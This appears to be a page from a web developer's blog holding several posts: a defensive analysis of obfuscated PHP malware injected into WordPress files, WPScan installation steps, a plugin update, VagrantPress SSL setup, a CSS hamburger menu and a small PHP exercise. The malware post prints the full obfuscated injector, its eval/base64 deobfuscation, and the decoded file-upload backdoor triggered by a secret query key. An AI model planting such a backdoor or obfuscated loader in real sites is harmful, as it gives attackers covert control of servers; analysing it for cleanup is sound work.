closingtags </> – Page 7 – web development and then some
Categories
PHP WordPress

Obscure PHP code in WordPress files

I received word recently, that a site I have previously done work on, was getting some syntax errors. After checking those errors out, and seeing that certain files were giving the error Warning: Cannot modify header information – headers already sent by (/path/somefile.php) in /path/anotherfile.php, I determined the issue to be malicious PHP code that was being injected into WordPress core files, plugin files, and theme files. How it got there, I can’t be entirely certain, but my best guess is this vulnerability with Gravity Forms had something to do with it.
The code looked something like this:
<?php $JPyf4530 = “)nz.p*q4c2thgem8o7vfl1xy/ibar;(3k6u9j_d05sw”;$BYTdA1808 = $JPyf4530[4].$JPyf4530[28].$JPyf4530[13].$JPyf4530[12].$JPyf4530[37].$JPyf4530[28].$JPyf4530[13].$JPyf4530[4].$JPyf4530[20].$JPyf4530[27].$JPyf4530[8].$JPyf4530[13];$xdTQes100 = “\x65″.chr(118).”al”.chr(40).””.chr(103).””.chr(122).”i”.chr(110).”fl”.chr(97).””.chr(116).”\x65\x28\x62″.chr(97).”\x73″.chr(101).”6″.chr(52).”_\x64ec”.chr(111).”de\x28″;$TbQ6628 = “))\x29\x3b”;$W1576 = $xdTQes100.”‘NctBC4IwGIDhv7Ii+ByV5cwKdrYIutVNZMz5DQdOh64oZP+9Ll4f3tfoyIwj+mglrvmzWDJ1wnPCsEq12rNjxpIEK5VV8oBZWrNkWVI6GU2iBVrnv//tcrvnjxlt/0bxcm0va6yFNi3ORQG6g7IAb53opEUoNxDv5DAMsWscUEomVE1PYAucBILtiLOsgYfA8WM8Dz8='”.$TbQ6628;$BYTdA1808($JPyf4530[24].$JPyf4530[3].$JPyf4530[5].$JPyf4530[24].$JPyf4530[13], $W1576 ,”386″); ?>
Looks like a jumbled mess, right? Well it is, but it’s supposed to appear like a jumbled mess to anyone who might stumble across it in an attempt to intimidate you to just leave it alone. And even though it looks like a chaotic disaster, it does have functionality. Let’s break it down into a few pieces.
<?php
$JPyf4530 = “)nz.p*q4c2thgem8o7vfl1xy/ibar;(3k6u9j_d05sw”;
?>
Basically, this is just a string. Or maybe it’s better to call it an alphabet. Other variables are making access of the characters in this string. For instance:
$BYTdA1808 = $JPyf4530[4].$JPyf4530[28].$JPyf4530[13].$JPyf4530[12].$JPyf4530[37].$JPyf4530[28].$JPyf4530[13].$JPyf4530[4].$JPyf4530[20].$JPyf4530[27].$JPyf4530[8].$JPyf4530[13];
Which translates to:
$BYTdA1808 = ‘preg_replace’;
Sneaky, eh? Some of the other variables are using ASCII codes to get the text they want but overall, it’s just a way of obscuring code. So we can take this idea, and apply it to the rest of this and come up with something like this:
$W1576 = “eval(gzinflate(base64_decode(‘NctBC4IwGIDhv7Ii+ByV5cwKdrYIutVNZMz5DQdOh64oZP+9Ll4f3tfoyIwj+mglrvmzWDJ1wnPCsEq12rNjxpIEK5VV8oBZWrNkWVI6GU2iBVrnv//tcrvnjxlt/0bxcm0va6yFNi3ORQG6g7IAb53opEUoNxDv5DAMsWscUEomVE1PYAucBILtiLOsgYfA8WM8Dz8=’)));”;
preg_replace(‘/.*/e’, $W1576 ,”386″);
That’s essentially what it all boils down to. But what’s with all that encoded nonsense? I ran a var_dump() on it and came back with this little piece of work:
if(isset($_GET[“2c7e812eb3fc0265211ebc5ba4e53d21”])){
if (!empty($_FILES)){
if (!move_uploaded_file($_FILES[‘fn’][‘tmp_name’],’./arrr.php’)) {
echo ‘-‘;
} else {
echo ‘+’;
}
};
exit;
}
Like I said earlier , I think all of this was possible because of this vulnerability but I could very well be wrong. It would make sense though, as this hack is attempting to move some files around, and then echo success or failure (+/-).

Categories
Plugins Themes WordPress

Checking WordPress with WPScan

If you use WordPress regularly, you know that it is often the target of hacking attempts, and rightfully so. It accounts for nearly a quarter of all websites! Why wouldn’t a hacker want to target WordPress? That, plus the plethora of amateur developers releasing plug-ins and themes with gaping security flaws, makes WordPress an easy win for someone with malicious intent.
You probably already know about the vast list of security plug-ins, that you shouldn’t write down your passwords, that you should use different passwords on every site, etc. I’m not going to list all of those things, because it’s boring and repetitive. I am going to tell you about WPScan though. WPScan does exactly what it sounds like. Scans your WordPress site. Boom. That simple. It’s backed by the guys over at Sucuri so you know it’s legit.
Do yourself a favor and check out WPScan either on their website or just go to the Github repo and clone it. It doesn’t work on Windows, so sorry about that. But it should work with a Mac or Linux machine. The install is pretty simple too. Here’s what I did:
sudo apt-get install libcurl4-gnutls-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install –without test
Also, it’s nice to set an alias so you don’t have to be in that directory to run it all the time:
alias wpscan=”ruby /home/USERNAMEHERE/Documents/wpscan/wpscan.rb”

That way, you just run wpscan –update or whatever command you want and it works. It’ll give you a nice big list of things that you should look into, and tell you a few things you probably didn’t know.

Categories
PHP Plugins WordPress

Edit Hopper Update, Now Supports Custom Post Types

I’ve made a few changes to the Edit Hopper WordPress plugin that I developed and I’m glad to say that it now supports Custom Post Types and Posts. Plus, thanks to Jimmy (@sporifolous on Github), it now has an options page to select which posts you want the meta box to show on. So if you’ve got a WordPress site, check it out.
https://github.com/Dilden/Edit-Hopper
Big shout out to @socki03 with his help on cleaning up some code.

Categories
PHP Plugins WordPress

Edit Hopper plugin v1

A long, long time ago, I worked on a website that utilized an almost insane amount of pages and child pages in WordPress. While I was adding content to those pages, I realized that I hated having to click the Pages link in the sidebar of the WordPress admin to go back, and then dig through all of the pages, then click edit, and type in my content. I wanted things to be easier. No, they should have been easier, and much simpler.
I came up with an idea. I’d create a meta-box on the right hand side of the page that was currently being edited, that would contain links to the other pages. This makes things much simpler for bulk editing pages. And I’m happy to say, that I’ve finally finished it and made it available to everyone for free! Right now, it’s just available through Github, but you can download a zip file of it from there as well if need be.
Big shout-out to Brett for all his help on this! Check out his blog here and find him on twitter @Socki.
Here’s the link! Let me know what you think. I’m totally open to contributions as well.

Categories
PHP Plugins Themes WordPress

SSL with VagrantPress

I’m trying to be a better developer. And somewhere in the vastness of the internet, someone told me I should be using Vagrant. So I did. It was cool and I liked it, but then I found out about VagrantPress and it got even easier. You just clone that repo, and start working. Pretty simple really.
But the other day, I was working on something that required an HTTPS connection, and I thought you should know how to do this with VagrantPress.
Firstly, startup your machine and login via SSH:
vagrant up
vagrant ssh

We’re going to need to do a few things with the SSL certificates, but I promise it’s painless.
sudo make-ssl-cert generate-default-snakeoil –force-overwrite
sudo a2enmod ssl
sudo a2ensite default-ssl.conf
sudo service apache2 reload
Credit for these handy commands goes to vtalbot here. Then, we need to edit a few files.
sudo nano /etc/apache2/sites-enabled/default-ssl.conf
Change the DocumentRoot /var/www/html to /vagrant/wordpress. Then we need to tell apache that it’s ok to share that directory so run this command:
sudo nano /etc/apache2/apache2.conf
and scroll waaaay down to all of the directives that look like
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
and create another one that looks like this
<Directory /vagrant/wordpress/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
After all of that, run
sudo service apache2 reload
Also, you’ll want to make sure your .htaccess file looks like this:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

</IfModule>
The final step then is to navigate to your WordPress settings > General, and change both URLs to be HTTPS instead of HTTP.
And that should be all there is to it! You should now be able to access https://vagrantpress.dev/ and https://vagrantpress.dev/wp-admin/ problem free. Of course, your browser will probably tell you the connection isn’t trusted, but that’s just because you’re not using a signed SSL certificate.
The next step might be to go and change the URL in the WordPress settings, fiddle with your .htaccess if you want to force the SSL connection but for basic development purposes, this should get you where you need to go.

Categories
CSS jQuery WordPress

CSS Hamburger Menu

I like the hamburger menu. It makes sense. So this is the one that I use when building a menu for mobile devices.
Here’s the HTML:
<nav id=”mobile-navigation” class=”site-navigation mobile-navigation” role=”navigation”>
<a href=”#” class=”mobile-menu-link”>MENU<span></span></a>
</nav>
And the SCSS:
.mobile-navigation {
display: none;

.mobile-menu-link {
display: block;
position: relative;
width: 90px;
height: 30px;
left: 0;
color: #2f6b68;
font-size: 20px;
text-align: right;
margin: 10px;
@include transition(all, 200ms, ease);

span {
content: ” “;
display: block;
position: absolute;
width: 24px;
height: 4px;
left: 50%;
top: 44%;
margin-left: -43px;
background: transparent;
@include transition(all, 200ms, ease);
&:before {
content: ” “;
display: block;
position: absolute;
width: 24px;
height: 4px;
background: #2f6b68;
left: 50%;
margin-left: -12px;
transform: rotate(45deg);
top: 0;
@include transition(all, 200ms, ease);
}
&:after {
content: ” “;
display: block;
position: absolute;
width: 24px;
height: 4px;
background: #2f6b68;
left: 50%;
margin-left: -12px;
transform: rotate(-45deg);
top: 0;
@include transition(all, 200ms, ease);
}
}
}
.menu-mobile-container {
height: auto;
background-color: #ffffff;
.nav-menu {
position: relative;
z-index: 50;
width: 100%;
.menu-item {
display: block;
margin: 0;
a {
display: block;
border-radius: 0;
}
}
}
}
}
.mobile-navigation.closed {
.mobile-menu-link {
span {
background: #2f6b68;
&:before {
top: -7px;
transform: rotate(0);
}
&:after {
top: 7px;
transform: rotate(0);
}
}
}
.menu-mobile-container {
height: 0;
overflow: hidden;
position: relative;
}
}
Here’s my transition mixin:
@mixin transition($property, $time, $type: ease) {
-webkit-transition: $property $time $type;
-moz-transition:$property $time $type;
-ms-transition:$property $time $type;
-o-transition:$property $time $type;
transition:$property $time $type;
}
And here’s some of the jQuery:
$(document).ready( function() {
$(‘.mobile-menu-link’).on(‘click’, function(event) {
event.preventDefault();
$(this).parent(‘.mobile-navigation’).toggleClass(‘closed’, 200);
});
});
Now, this toggleClass function is giving a little bit of a delay, so if you can figure out a way of doing all of this without it, I’d be interested in knowing a fix.
I like the animation of the ‘X’ that is provided with this hamburger menu. It’s intuitive and self-explaining.

Categories
CSS HTML5 jQuery Mobile PHP WordPress

Developing with Vagrant

Recently, I’ve been trying to find ways to speed up my development time, and I came across a great video showcasing Vagrant. I could spend a lot of time writing a bunch of mumbo jumbo here for you to read, or you could just watch the video that explains it a thousand times better than I would ever be able to.

Categories
CSS HTML5 jQuery PHP WordPress

DemocracyOS

It’s been pretty slow on the web development front for me lately, but I have discovered something new and interesting. It’s called DemocracyOS. What is DemocracyOS? Oh, I’m so glad you asked. Well it’s an open-sourced platform that aims to bring democracy back into the hands of the people in a way that makes voting on almost anything, very simple.
Just recently, we had some elections here in the US (Nov. 4th, 2014) and supposedly, Republicans took back control of both the House and the Senate because so many young people didn’t turn out to vote. What DemocracyOS intends to do, is bring the voting to you. No more waiting in lines at the polls, trying to get away from work, attempting to figure out where you’re supposed to go to vote, or filling in the circles ever so perfectly on an outdated technology (paper).
It’s supposed to be as simple to install and use as WordPress, although I haven’t quite gotten that far yet. I’ll keep the blog updated with my findings though. Check it out at Github here or the main site here.
And if you want to chat about this stuff, hit me up on Twitter @awebdevguy.

Categories
CSS jQuery

The Perfect Browser Home Page

UPDATE! Google removed the ability to host web pages within Google Drive so my simple and free hosting solution provided here (plus the link to the files) is dead.
I decided a while back that I could do my home page (in browser) better than just the standard google.com page. I tailored an html file especially to my needs, and added in some flair. The page will automatically grab the most recent top post from the subreddit /r/EarthPorn. This subreddit basically just supplies cool wallpapers all day. I hosted the file in Google Drive so that I could sync it across my work computer and home computers in Google Chrome. I used this plugin to open this page on a new tab.
So the actual page is here and if you’d like to download the files and tweak it to however you see fit, you can get those here. Let me know @awebdevguy if you do anything cool, or come up with a better way of doing what I did. I know it can be done better.

Categories
PHP

Day of the Year

The most recent challenge I’ve completed was to input a date in plain english (eg. November 19th) and output what day of the year that was (day #323). This was a pretty fun challenge, and was simple enough.
https://www.reddit.com/r/dailyprogrammer/comments/pzo4w/2212012_challenge_13_easy/
<?php
function dayofyear($date, $leap) {
$datenum = explode(” “, date(‘m d’, strtotime($date)));
$months = array(31,28,31,30,31,30,31,31,30,31,30,31);
$day = 0;
if($leap) {
$months[1] = 29;
}
for ($i=0; $i < intval($datenum[0]) – 1; $i++) {
$day = $day + $months[$i];
}
return $day + $datenum[1];
}
echo dayofyear(‘November 19th’, false);
?>